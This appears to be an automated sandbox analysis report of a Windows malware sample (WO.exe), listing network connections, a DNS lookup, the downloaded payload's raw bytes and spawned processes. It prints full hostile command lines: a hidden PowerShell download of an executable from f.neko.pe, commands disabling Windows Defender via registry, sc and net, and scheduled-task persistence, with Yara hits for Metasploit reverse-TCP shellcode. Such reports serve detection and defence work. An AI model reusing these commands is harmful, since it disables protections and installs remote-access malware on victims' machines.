                                                            Dec 23, 2024 19:54:34.865031958 CET497421121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:49.322274923 CET112149740147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:49.322410107 CET497401121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:49.323249102 CET497401121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:49.330915928 CET497431121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:49.442954063 CET112149740147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:49.450489044 CET112149743147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:49.450568914 CET497431121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.744452953 CET112149741147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.744537115 CET497411121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.744961023 CET497411121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.745867968 CET497451121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.759867907 CET112149742147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.759944916 CET497421121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.760442019 CET497421121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.761166096 CET497461121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.864953995 CET112149741147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.865756035 CET112149745147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.865859985 CET497451121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:56.879909039 CET112149742147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.880853891 CET112149746147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:56.881036997 CET497461121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:06.050448895 CET497631121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:06.170289040 CET112149763147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:06.170510054 CET497631121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:11.385516882 CET112149743147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:11.385658026 CET497431121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:11.386077881 CET497431121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:11.387069941 CET497791121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:11.505800962 CET112149743147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:11.506777048 CET112149779147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:11.506951094 CET497791121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.761699915 CET112149745147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.761775970 CET497451121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.762178898 CET497451121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.763004065 CET497951121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.775876999 CET112149746147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.775948048 CET497461121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.776299953 CET497461121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.777081966 CET497961121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.881819010 CET112149745147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.882658958 CET112149795147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.882739067 CET497951121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:18.896097898 CET112149746147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.896864891 CET112149796147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:18.896929026 CET497961121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:28.095720053 CET112149763147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:28.095777035 CET497631121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:28.096169949 CET497631121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:28.096914053 CET498171121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:28.215965033 CET112149763147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:28.216461897 CET112149817147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:28.216586113 CET498171121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:33.416738033 CET112149779147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:33.416862011 CET497791121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:33.417294025 CET497791121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:33.418087006 CET498311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:33.536952019 CET112149779147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:33.537940025 CET112149831147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:33.538016081 CET498311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.870372057 CET112149796147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:40.874428034 CET497961121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.874836922 CET497961121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.875685930 CET498491121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.885548115 CET112149795147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:40.885847092 CET497951121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.886390924 CET497951121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.887249947 CET498501121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:40.994458914 CET112149796147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:40.995260000 CET112149849147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:40.995347023 CET498491121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:41.005944014 CET112149795147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:41.006825924 CET112149850147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:41.006901026 CET498501121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:50.105205059 CET112149817147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:50.105282068 CET498171121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:50.105695009 CET498171121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:50.106537104 CET498701121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:50.225459099 CET112149817147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:50.226257086 CET112149870147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:50.226463079 CET498701121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:55.418540955 CET112149831147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:55.418726921 CET498311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:55.419152021 CET498311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:55.419979095 CET498821121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:55:55.540427923 CET112149831147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:55.541160107 CET112149882147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:55:55.541243076 CET498821121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:56:02.964159966 CET112149849147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:56:02.964262962 CET498491121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:56:03.011008978 CET112149850147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:56:03.011071920 CET498501121192.168.2.4147.185.221.23

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 23, 2024 19:54:01.633519888 CET6247253192.168.2.41.1.1.1
                                                            Dec 23, 2024 19:54:02.002512932 CET53624721.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 23, 2024 19:54:01.633519888 CET192.168.2.41.1.1.10xb3c4Standard query (0)f.neko.peA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 23, 2024 19:54:02.002512932 CET1.1.1.1192.168.2.40xb3c4No error (0)f.neko.pe185.151.51.214A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • f.neko.pe

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730185.151.51.2144432316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-23 18:54:03 UTC88OUTGET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1
                                                            Host: f.neko.pe
                                                            Connection: Keep-Alive
                                                            2024-12-23 18:54:04 UTC428INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 23 Dec 2024 18:54:04 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 73802
                                                            Connection: close
                                                            X-Powered-By: Express
                                                            Content-Disposition: filename="reddit.exe"
                                                            Access-Control-Allow-Origin: *
                                                            Accept-Ranges: bytes
                                                            Cache-Control: public, max-age=0
                                                            Last-Modified: Wed, 18 Dec 2024 02:39:39 GMT
                                                            ETag: W/"1204a-193d7a2a17c"
                                                            Strict-Transport-Security: max-age=31536000
                                                            2024-12-23 18:54:04 UTC15956INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 38 f0 d6 d7 59 9e 85 d7 59 9e 85 d7 59 9e 85 ac 45 92 85 d3 59 9e 85 54 45 90 85 de 59 9e 85 b8 46 94 85 dc 59 9e 85 b8 46 9a 85 d4 59 9e 85 d7 59 9f 85 1e 59 9e 85 54 51 c3 85 df 59 9e 85 83 7a ae 85 ff 59 9e 85 10 5f 98 85 d6 59 9e 85 52 69 63 68 d7 59 9e 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b4 35 45 4a 00 00 00 00 00 00 00 00 e0 00 0f
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8YYYEYTEYFYFYYYTQYzY_YRichYPEL5EJ
                                                            2024-12-23 18:54:04 UTC16384INData Raw: 00 8d 73 20 68 2b e8 40 00 56 ff d7 83 c4 3a 89 45 f8 85 c0 06 85 85 00 00 00 68 b4 df 40 00 56 ff d7 83 c4 08 24 45 f8 85 c0 c7 45 f0 02 00 ef 00 75 6c 8b 45 ec 85 c0 0f 85 05 04 00 00 a1 f8 17 71 6f 8b 94 04 8d 55 d8 c7 45 dc 01 00 00 00 52 c8 89 70 ce e8 52 6a 73 00 8b 4b 04 51 e8 59 f4 00 00 8b 15 d0 02 41 00 a1 b8 02 41 00 ca 89 15 d7 02 f4 00 22 d0 40 83 fa fb a3 b8 02 3b 00 7e 0d 68 b2 d2 42 00 b2 70 d8 3e ff a9 c4 04 53 e8 77 f9 22 ff 83 c4 04 3c fb e9 c8 c5 00 00 cd 0b 02 41 00 4f f9 75 2e 0c e0 e8 40 00 2c ff d7 83 c4 b9 ba 53 05 cf 00 b6 c0 74 17 8a 48 08 e9 c0 08 80 f9 20 7e 6b 88 0a 8a 48 01 42 40 80 f9 20 7f f4 c6 02 00 68 6c 14 40 00 c2 f5 3d 8b 0f 83 c4 13 4d d2 c0 36 64 fa 01 c9 ff f2 c0 f2 ee f7 d1 49 83 f9 09 76 1f 83 38 09 6a f2 75 45
                                                            Data Ascii: s h+@V:Eh@V$EEulEqoUERpRjsKQYAA"@;~hBp>Sw"<AOu.@,StH ~kHB@ hl@=M6dIv8juE
                                                            2024-12-23 18:54:05 UTC16384INData Raw: 0e 46 40 db 75 fe c6 06 65 46 85 db 7d 07 f7 db 50 06 2d eb 71 c6 06 5c 8b c3 b9 64 00 65 00 7b f7 f9 46 85 c0 8b fa 7e 73 04 30 88 f3 46 8b c3 b9 0a a4 00 09 1f f7 f9 84 c0 8b ca 7e 17 b8 67 66 42 66 03 ef c1 fa 02 07 c2 c1 81 1f 3c d0 80 c2 30 88 16 46 80 c1 30 88 0e d0 59 44 ff ff 7a c2 ff 06 4b 5f 5e 8b 1c 5d c3 90 90 55 8b ec 8b 3c 1c fc 4d 18 8b 55 14 50 8b 45 10 6a ce 51 8b 4d 0c 52 8b 55 08 50 51 52 e8 0e c1 00 00 80 81 1c 5d c3 90 90 de 90 d9 90 22 90 90 55 8b ec 9e ec 14 4f 22 10 4b 7c 07 c7 45 10 4e 00 00 00 df 97 42 98 1d 30 c2 5b 00 8b 16 18 75 8b 5d 20 19 33 f6 57 e6 af 89 75 fc 89 31 f6 f1 05 eb fb 7a 0e 80 45 23 d9 e0 dd 5d 08 c7 01 01 00 00 00 8b 4d 0c 8b ac 08 8d 45 ec 50 51 52 ff 15 18 b0 40 00 dd 5d 08 dd 45 ec dc 1d 30 c2 40 3a 83 c4
                                                            Data Ascii: F@ueF}P-q\de{F~s0F~gfBf<0F0YDzK_^]U<MUPEjQMRUPQR]"UO"K|ENB0[u] 3Wu1zE#]MEPQR@]E0@:
                                                            2024-12-23 18:54:05 UTC16384INData Raw: 00 00 f1 00 00 4d 00 00 00 00 00 00 f0 00 00 00 00 00 28 00 de 03 00 a2 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 00 11 eb 00 00 00 00 00 00 00 00 00 e9 76 cc 00 00 00 00 75 20 00 00 00 00 00 00 fb 00 00 00 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 00 00 00 41 00 f7 00 00 e5 00 00 00 00 00 58 33 00 00 98 00 00 00 6e 00 a6 00 00 81 00 00 00 00 b2 00 00 00 00 00 00 00 00 0d 00 00 13 00 00 00 00 00 00 00 00 00 c7 00 00 00 00 00 00 00 7a 35 00 00 00 9c 00 00 00 00 00 8f 89 00 00 00 00 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 20 00 b9 b5 00 00 f2 b7 00 00 00 00 00 00
                                                            Data Ascii: M({#evu tAX3nz56
                                                            2024-12-23 18:54:05 UTC8694INData Raw: 54 68 65 20 73 70 65 63 69 66 69 65 64 20 49 50 20 61 64 64 72 65 73 73 20 69 73 20 69 6e 76 61 6c 69 64 2e 00 00 00 00 44 53 4f 20 6c 6f 61 64 20 66 61 69 6c 65 64 00 4e 6f 20 73 68 61 72 65 64 20 6d 65 6d 6f 72 79 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 61 76 61 69 6c 61 62 6c 65 00 4e 6f 20 74 68 72 65 61 64 20 6b 65 79 20 73 74 72 75 63 74 75 72 65 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 4e 6f 20 74 68 72 65 61 64 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 00 00 4e 6f 20 73 6f 63 6b 65 74 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 00 00 4e 6f 20
                                                            Data Ascii: The specified IP address is invalid.DSO load failedNo shared memory is currently availableNo thread key structure was provided and one was required.No thread was provided and one was required.No socket was provided and one was required.No


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\Desktop\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\WO.exe"
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:13:53:59
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:13:54:03
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_MetasploitPayload, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 89%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:7
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:13:54:05
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 58%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:13:54:05
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
